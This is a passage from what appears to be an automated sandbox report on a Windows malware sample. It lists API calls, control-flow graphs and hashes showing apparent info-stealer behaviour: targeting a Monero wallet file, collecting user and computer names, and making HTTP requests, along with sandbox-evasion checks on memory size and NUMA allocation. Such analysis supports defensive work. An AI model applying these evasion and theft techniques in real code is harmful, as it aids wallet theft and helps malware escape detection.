                            • Part of subcall function 00627850: RtlAllocateHeap.NTDLL(00000000), ref: 00627887
                            • Part of subcall function 00627850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0062789F
                            • Part of subcall function 006278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627910
                            • Part of subcall function 006278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00627917
                            • Part of subcall function 006278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0062792F
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00626AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00626AF9
                          • Sleep.KERNEL32(00001770), ref: 00626B04
                          • CloseHandle.KERNEL32(?,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626B1A
                          • ExitProcess.KERNEL32 ref: 00626B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 0e6abefe62a9e2aa98b699a37bfe6890b3833f24153bc82adb9bb1127c6a1116
                          • Instruction ID: 205fc8a277eafc7693b9f2bfeea5d9d38c34b8994c18888926eb2283f0d40e0a
                          • Opcode Fuzzy Hash: 0e6abefe62a9e2aa98b699a37bfe6890b3833f24153bc82adb9bb1127c6a1116
                          • Instruction Fuzzy Hash: 66311C70910628ABDB44F7F0EC56AEE777ABF14341F00451CF602A6181DFB45945CFAA
                          Function 00611220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 611220-611247 call 6289b0 GlobalMemoryStatusEx 1439 611273-61127a 1436->1439 1440 611249-611271 call 62da00 * 2 1436->1440 1442 611281-611285 1439->1442 1440->1442 1444 611287 1442->1444 1445 61129a-61129d 1442->1445 1447 611292-611294 ExitProcess 1444->1447 1448 611289-611290 1444->1448 1448->1445 1448->1447
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0061123E
                          • __aulldiv.LIBCMT ref: 00611258
                          • __aulldiv.LIBCMT ref: 00611266
                          • ExitProcess.KERNEL32 ref: 00611294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: d96c4f72886ed75a9a3ed69771f57b5caf08b97400a909c927f5105da6c93277
                          • Instruction ID: dd92222a07b1527ec218b3763bfefc30413643e83943a6a37abe83f630fceda7
                          • Opcode Fuzzy Hash: d96c4f72886ed75a9a3ed69771f57b5caf08b97400a909c927f5105da6c93277
                          • Instruction Fuzzy Hash: F0014BB0D44318AAEF10DBE4DC4ABDEBBB9BB15702F248148E705BA280D67456818B99
                          Function 00626AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 626af3 1451 626b0a 1450->1451 1453 626aba-626ad7 call 62aad0 OpenEventA 1451->1453 1454 626b0c-626b22 call 626920 call 625b10 CloseHandle ExitProcess 1451->1454 1459 626af5-626b04 CloseHandle Sleep 1453->1459 1460 626ad9-626af1 call 62aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00626AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00626AF9
                          • Sleep.KERNEL32(00001770), ref: 00626B04
                          • CloseHandle.KERNEL32(?,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626B1A
                          • ExitProcess.KERNEL32 ref: 00626B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: d32c06d3907a6ddb1434ff40fb2e1921745e26731f5132b2d3a94f751176ca73
                          • Instruction ID: d5a22e2f8ebd625265d30ac82149436983c7b952eee81de98af1d3d7e457df52
                          • Opcode Fuzzy Hash: d32c06d3907a6ddb1434ff40fb2e1921745e26731f5132b2d3a94f751176ca73
                          • Instruction Fuzzy Hash: 92F05E30940B29EBE750ABA0ED56BBD7B75FF14703F104618B913A11C1CBB45541DF5A
                          Function 006147B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 1c806b190d718c1e99be193417b8bdb644228a68d38af3c8b53e29a2c8445147
                          • Instruction ID: b0b15c03259518867c91205fc87351f6b558087794481319dd2b55b1fd50e402
                          • Opcode Fuzzy Hash: 1c806b190d718c1e99be193417b8bdb644228a68d38af3c8b53e29a2c8445147
                          • Instruction Fuzzy Hash: 53214FB1D00209ABDF14DFA4E845ADE7B75FF45320F108629F955A72C1EB706A05CF81
                          Function 006251F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 00616280: InternetOpenA.WININET(00630DFE,00000001,00000000,00000000,00000000), ref: 006162E1
                            • Part of subcall function 00616280: StrCmpCA.SHLWAPI(?,0111E858), ref: 00616303
                            • Part of subcall function 00616280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00616335
                            • Part of subcall function 00616280: HttpOpenRequestA.WININET(00000000,GET,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00616385
                            • Part of subcall function 00616280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006163BF
                            • Part of subcall function 00616280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006163D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 4a10e14a73a35147f571214c2961a14d10fd12992a679e373afe6cdbf057cacb
                          • Instruction ID: 4d59596e3cb6a834d3aaff738d885b46f1735b4f097b64afcd4d513b310161c6
                          • Opcode Fuzzy Hash: 4a10e14a73a35147f571214c2961a14d10fd12992a679e373afe6cdbf057cacb
                          • Instruction Fuzzy Hash: 6C113370900918ABCB54FFA0ED52AED737BAF50300F40415CF90A5A192EF74AB06CE9A
                          Function 006278E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0062792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 9824f7776fd1aae7e4a96ef5427e030c51f303eb3a540fec0db2eab127e7f678
                          • Instruction ID: bf2041b5300eb23cdf7eb883a4ac39f77d428baba8d55cd0aca3c3c3811849cb
                          • Opcode Fuzzy Hash: 9824f7776fd1aae7e4a96ef5427e030c51f303eb3a540fec0db2eab127e7f678
                          • Instruction Fuzzy Hash: C00162B1904705EBC704DF94DD45FABBBB8F704B12F104229E645E2280C37559448BA1
                          Function 00611110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0061112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00611132
                          • ExitProcess.KERNEL32 ref: 00611143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 7e5184f4df4a991d45af125e2bfe6741b4502ad1c0c8df1d54f52feebf4261f0
                          • Instruction ID: 2a5fb6e58b7472e0d9e16beb9fb704f14657243b86ca4179514293783f7bb334
                          • Opcode Fuzzy Hash: 7e5184f4df4a991d45af125e2bfe6741b4502ad1c0c8df1d54f52feebf4261f0
                          • Instruction Fuzzy Hash: 07E0867094530CFBE714ABA09C0AB487A78BB04B03F100154F7087A5D0D6B826409699
                          Function 006110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006110B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006110F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: a7f452fd440011c9284273ab7bcd76166e0d519767b33e81669923053cc8fe0f
                          • Instruction ID: 911c6711c81bf003f812127552e3eed953f871e2079c1b398fbff0b7253146c8
                          • Opcode Fuzzy Hash: a7f452fd440011c9284273ab7bcd76166e0d519767b33e81669923053cc8fe0f
                          • Instruction Fuzzy Hash: B4F0E971A41314BBE71496A4AC49FEEB7DCE709716F300548F604E7280D5715E40CA64
                          Function 00611190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 006278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627910
                            • Part of subcall function 006278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00627917
                            • Part of subcall function 006278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0062792F
                            • Part of subcall function 00627850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006111B7), ref: 00627880
                            • Part of subcall function 00627850: RtlAllocateHeap.NTDLL(00000000), ref: 00627887
                            • Part of subcall function 00627850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0062789F
                          • ExitProcess.KERNEL32 ref: 006111C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 04a1540fb9bb4c1fbff1197fd903da8ab2cf3cd5d3c8384adee35a1ae7f14503
                          • Instruction ID: 4d7440ea80c9c057ca7307a74d838cd327096afa0427c5aa214452a30852676a
                          • Opcode Fuzzy Hash: 04a1540fb9bb4c1fbff1197fd903da8ab2cf3cd5d3c8384adee35a1ae7f14503
                          • Instruction Fuzzy Hash: E5E012B5D1471567CA4473F0BC4BFAA369E6B15746F08053CFA05D7202FE2DE800896E

                          Non-executed Functions

                          Function 006238B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 006238CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 006238E3
                          • lstrcat.KERNEL32(?,?), ref: 00623935
                          • StrCmpCA.SHLWAPI(?,00630F70), ref: 00623947
                          • StrCmpCA.SHLWAPI(?,00630F74), ref: 0062395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00623C67
                          • FindClose.KERNEL32(000000FF), ref: 00623C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
